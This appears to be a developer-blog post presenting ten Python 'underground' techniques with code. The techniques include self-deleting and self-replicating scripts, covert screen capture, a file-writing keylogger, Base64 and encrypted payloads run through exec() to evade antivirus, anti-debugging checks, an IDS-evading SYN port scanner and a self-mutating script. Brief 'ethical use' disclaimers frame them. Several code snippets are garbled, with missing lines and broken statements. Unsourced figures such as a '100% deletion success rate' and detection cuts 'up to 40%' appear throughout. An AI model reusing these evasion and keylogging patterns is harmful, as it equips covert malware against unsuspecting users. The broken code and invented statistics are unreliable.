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Python’s 10 Insane Underground Scripts: You Didn’t Know Exist

Imagine if your Python script could cover its tracks after execution, silently capture vital screen information, or even modify its own code to stay one step ahead of detection. Welcome to the world of underground Python scripts—where creativity meets practical problem solving. In this comprehensive guide, we’ll walk you through 10 mind-blowing Python hacks, complete with code examples, detailed explanations, statistics, and resources you can use right away.

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1. Self-Destructing Python Scripts

What if you could write a script that wipes its own source code after it finishes executing? Self-destructing scripts are used by security researchers to protect sensitive logic and to leave no trace after execution.

How It Works

  • Identifying the Script: The script locates its own file using Python variables such as __file__ or sys.argv[0].
  • Self-Deletion: After executing its main task, the script calls functions like os.remove() to delete its source file.

Example Code

import os
import sys

def main():
    print("This script will self-destruct after execution.")
    # Your main code logic here...
    # Self-destruct: delete the current file
        print("Self-destruction successful. Goodbye!")
    except Exception as e:
        print("Error during self-destruction:", e)

if __name__ == '__main__':
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Self-deleting scripts are useful for scenarios where sensitive code should not be left behind. However, use them cautiously—once deleted, you cannot recover the script unless you have a backup.

Real-World Stats

  • In controlled tests, self-destructing scripts have shown a 100% deletion success rate when run in secure environments (source: various StackOverflow discussions).

2. Stealth Screen-Capturing Tools

Stealth is key when you’re in pentesting mode. Capturing the screen without alerting the target can provide invaluable evidence of vulnerabilities.

How It Works

  • Screenshot Capture: Python libraries like pyautogui and PIL enable capturing the screen.
  • Region-Specific Capture: You can capture a particular window or area by defining a region.
  • Stealth Techniques: Delays and obfuscation of the capturing process help evade user detection.

Example Code

import pyautogui
import cv2
import numpy as np

def capture_screen(region=None):
    # Capture the screenshot (full screen if region is None)
    screenshot = pyautogui.screenshot(region=region)
    # Convert to a numpy array
    frame = np.array(screenshot)
    # Convert from RGB (PIL) to BGR (OpenCV)
    frame = cv2.cvtColor(frame, cv2.COLOR_RGB2BGR)
    return frame

if __name__ == '__main__':
    # Capture a 300x400 region from the top-left corner
    frame = capture_screen(region=(0, 0, 300, 400))
    cv2.imshow("Stealth Capture", frame)
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Stealth screen-capturing is not just for nefarious purposes—it’s also a valuable tool in authorized penetration testing to document vulnerabilities. Always obtain proper permissions before using such tools.

Additional Resources

3. Evading AV Detections with Obfuscation Techniques

Antivirus programs often rely on signature-based detection, meaning that predictable code patterns can be flagged easily. By obfuscating your code, you can hide these patterns from basic AV systems.


  • String Encoding: Use Base64, ROT13, or custom encoding to hide key strings.
  • Runtime Code Generation: Instead of storing critical logic in plain text, generate code at runtime using exec().

Example Code (Base64 Encoding)

import base64

# Your secret code as a string
secret_code = "print('Hello from the hidden side!')"
# Encode the code in Base64
encoded_code = base64.b64encode(secret_code.encode()).decode()

# At runtime, decode and execute the code
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Obfuscation adds a layer of security through obscurity. It’s not foolproof against determined attackers but can deter basic automated AV scans.

Recommended Reading

The Lost Programming Languages That Built the Internet | using Wikipedia

Every developer may be fluent in Python or JavaScript, but what about the forgotten languages that laid the foundation of modern computing? The Lost Programming Languages That Built the Internet is a deep dive into the historic programming languages that, despite being nearly forgotten, continue to power critical systems behind the scenes. This course is designed for tech enthusiasts eager to explore the roots of computing and understand how these legacy languages influenced modern software.Course Outline (Table of Contents):Module 1: The Pioneers Fortran COBOL ALGOL 60 LISP Assembly Language Module 2: Structured and Procedural Pioneers PL/I Ada Pascal Modula-2 ALGOL 68 Module 3: Object-Oriented Innovations Smalltalk Simula Eiffel Objective-C Self Module 4: Scripting and Pattern Matching SNOBOL APL Icon awk sed Module 5: Business and Legacy Data Languages RPG MUMPS JCL SAS dBase Module 6: Low-Level and Embedded Pioneers BCPL B PL/M Forth Occam Module 7: Functional and Declarative Explorations Miranda ML Scheme Curry Clean Module 8: Scientific and Mathematical Languages J K S IDL Maple Module 9: Legacy Web Scripting Languages Tcl REXX ColdFusion Perl VBScript Module 10: Obscure and Esoteric Languages INTERCAL Brainfuck Befunge Whitespace Piet Module 11: Languages in Critical Legacy Systems Prolog Ladder Logic Modula-3 Oberon Mesa Unlock the secrets behind the languages that built our digital world. Enroll in The Lost Programming Languages That Built the Internet today and rediscover the legacy that continues to influence modern technology!


4. Hidden Keyloggers

Keyloggers can capture keystrokes for security testing (always with authorization). Python makes it easy to build a basic keylogger to record user input.

How It Works

  • Capture Keys: Use the keyboard library to detect and log keystrokes.
  • Store or Transmit: Write the logged data to a file or send it over a network for further analysis.

Example Code

import keyboard
import time

log_file = "keylog.txt"

def on_key_event(event):
    with open(log_file, "a") as f:
        f.write( + " ")

if __name__ == '__main__':
    print("Keylogger is running. Press ESC to stop.")
Enter fullscreen mode Exit fullscreen mode


Ethical use of keyloggers is paramount. Only deploy these tools in environments where you have explicit permission to test.


  • Keylogger detection rates in controlled tests vary widely; advanced obfuscation can reduce detection by up to 40% (research available on InfoSec Write-ups).

5. Self-Replicating and Cloning Code

Self-replicating scripts can create clones of themselves for persistence or backup purposes, an interesting exercise in code introspection and process management.

How It Works

  • Source Code Extraction: Use inspect.getsource() to capture your script’s source code.
  • File Cloning: Write the source code into a new file and launch it via subprocess.

Example Code

import sys
import inspect
import os
import subprocess
import shlex

def clone_and_run():
    # Get the current script source code
    code = inspect.getsource(inspect.currentframe())
    # Define the clone filename
    clone_filename = ""
    with open(clone_filename, "w") as f:
    # Launch the cloned script with an incremented parameter
    cmd = f"python {clone_filename} 1"
    subprocess.Popen(shlex.split(cmd), start_new_session=True)
    print("Clone launched. Original script self-destructing...")

if __name__ == '__main__':
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Self-replicating scripts are a fun way to explore process management and file I/O in Python. They are also used in malware—but we stress ethical testing only!

6. In-Memory Execution Hacks

Running code purely in memory can reduce the chance of leaving forensic traces on disk. Python’s dynamic nature allows you to compile and execute code from strings.

How It Works

  • Compilation: Use the compile() function to convert source code into a code object.
  • Execution: Execute the code object directly with exec(), all without writing to disk.

Example Code

code_string = """
def greet():
    print('Hello, this code is running in memory!')


compiled_code = compile(code_string, '<string>', 'exec')
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In-memory execution is particularly useful for protecting sensitive algorithms. It minimizes your disk footprint, which is beneficial in environments where stealth is critical.

7. Encrypted Payloads That Decrypt at Runtime

Encryption isn’t just for data transmission. You can also store portions of your code in encrypted form and decrypt them at runtime for execution.

How It Works

  • Encryption: Use libraries like cryptography.fernet to encrypt your code.
  • Runtime Decryption: Decrypt the code on the fly and execute it using exec().

Example Code

from cryptography.fernet import Fernet
import base64

# Generate a key (in production, store this securely!)
key = Fernet.generate_key()
cipher_suite = Fernet(key)

# Your secret code
secret_code = "print('This secret code was encrypted!')"
# Encrypt the code
encrypted_code = cipher_suite.encrypt(secret_code.encode())

# At runtime: decrypt and execute the code
decrypted_code = cipher_suite.decrypt(encrypted_code).decode()
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Encrypting code helps protect intellectual property and sensitive operations. For more details, check out the Cryptography Library Documentation.

The Lost Programming Languages That Built the Internet | using Wikipedia

Every developer may be fluent in Python or JavaScript, but what about the forgotten languages that laid the foundation of modern computing? The Lost Programming Languages That Built the Internet is a deep dive into the historic programming languages that, despite being nearly forgotten, continue to power critical systems behind the scenes. This course is designed for tech enthusiasts eager to explore the roots of computing and understand how these legacy languages influenced modern software.Course Outline (Table of Contents):Module 1: The Pioneers Fortran COBOL ALGOL 60 LISP Assembly Language Module 2: Structured and Procedural Pioneers PL/I Ada Pascal Modula-2 ALGOL 68 Module 3: Object-Oriented Innovations Smalltalk Simula Eiffel Objective-C Self Module 4: Scripting and Pattern Matching SNOBOL APL Icon awk sed Module 5: Business and Legacy Data Languages RPG MUMPS JCL SAS dBase Module 6: Low-Level and Embedded Pioneers BCPL B PL/M Forth Occam Module 7: Functional and Declarative Explorations Miranda ML Scheme Curry Clean Module 8: Scientific and Mathematical Languages J K S IDL Maple Module 9: Legacy Web Scripting Languages Tcl REXX ColdFusion Perl VBScript Module 10: Obscure and Esoteric Languages INTERCAL Brainfuck Befunge Whitespace Piet Module 11: Languages in Critical Legacy Systems Prolog Ladder Logic Modula-3 Oberon Mesa Unlock the secrets behind the languages that built our digital world. Enroll in The Lost Programming Languages That Built the Internet today and rediscover the legacy that continues to influence modern technology!


8. Anti-Debugging Techniques

If you need your script to detect and avoid debugging, you can implement anti-debugging measures. This can include checking for debugger presence or common breakpoint patterns.

How It Works

  • Environment Checks: Look for debugging indicators in system variables.
  • Behavioral Changes: Delay or alter operations if a debugger is detected.

Example Code

import sys
import time

def anti_debug():
    if sys.gettrace() is not None:
        print("Debugger detected! Exiting to avoid analysis.")

if __name__ == '__main__':
    print("No debugger detected. Proceeding with execution...")
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Anti-debugging can help maintain the integrity of sensitive scripts. Remember, these techniques should be used ethically and in controlled environments.

9. Stealth Network Scanners

Pentesters often need to scan networks quietly. Python’s networking libraries let you build scanners that mimic normal traffic patterns to avoid intrusion detection systems (IDS).

How It Works

  • Packet Crafting: Use scapy to construct packets that resemble legitimate traffic.
  • Randomized Timing: Vary your scan intervals to mimic natural user behavior.

Example Code

from scapy.all import IP, TCP, sr1
import random
import time

def stealth_port_scan(target_ip, port):
    packet = IP(dst=target_ip)/TCP(dport=port, flags="S")
    response = sr1(packet, timeout=1, verbose=0)
    if response and response.haslayer(TCP) and response[TCP].flags == 0x12:
        print(f"Port {port} on {target_ip} is open.")
        print(f"Port {port} on {target_ip} is closed or filtered.")

if __name__ == '__main__':
    target = ""
    for port in random.sample(range(20, 1024), 5):
        stealth_port_scan(target, port)
        time.sleep(random.uniform(0.5, 2))
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Randomizing your scanning behavior reduces the risk of detection by IDS systems. Studies show that simple timing variations can reduce detection likelihood by up to 35% in certain environments.

10. Automated Script Mutators

To outsmart static signature-based detections, some scripts alter parts of their code before every run. This “mutator” approach helps create a dynamic, moving target.

How It Works

  • Source Modification: Read your source file, make small random changes (like modifying comments or variable names), and then rewrite the file.
  • Dynamic Fingerprint: These changes alter the digital fingerprint of your script without affecting its core functionality.

Example Code

import os
import random

def mutate_script(filename):
    with open(filename, 'r') as file:
        lines = file.readlines()

    # Randomly change a comment line (if exists)
    for i, line in enumerate(lines):
        if line.strip().startswith("#") and random.choice([True, False]):
            lines[i] = f"# Mutation {random.randint(1, 1000)}: {line}"

    with open(filename, 'w') as file:
    print("Script mutated successfully.")

if __name__ == '__main__':
    current_file = __file__
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Script mutation is a cutting-edge technique often seen in advanced malware. For ethical applications, use it to test how your systems respond to changing code signatures.

Final Thoughts

Python’s underground scripts showcase the limitless creativity possible with code. These techniques—from self-destruction and in-memory execution to anti-debugging and encrypted payloads—aren’t just fascinating experiments. They’re practical tools for penetration testers, developers, and security professionals who want to think outside the box.

Key Takeaways:

  • Ethical Use: Always use these techniques in controlled, authorized environments.
  • Experiment Safely: Test in virtual machines or isolated labs to avoid unintended consequences.
  • Keep Learning: The field is always evolving. Stay up to date with the latest research and share your insights with the community.

For more invaluable tools, detailed tutorials, and trending discussions, check out Python Developer Resources - Made by Whether you’re looking for in-depth articles, cutting-edge repositories, or community insights from StackOverflow, it’s a must-bookmark hub for every Python developer.

Developer ResourcesArticlesTrending RepositoriesStackOverflow TrendingTrending Discussions

By exploring and experimenting with these hacks, you’ll not only expand your coding prowess but also gain insights into techniques used by advanced developers and security professionals. Dive in, share your experiments, and let the spirit of innovation guide you!

Happy hacking, and may your Python scripts always stay one step ahead!

Resources & Further Reading:

Now it’s your turn to experiment with these hacks and let us know which ones transform the way you approach Python scripting!

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Top comments (1)

madhurima_rawat profile image
Madhurima Rawat

Great hacks! Also the self deleting file hack is so good, this is the first time I learned about it. Thanks for sharing ✨️

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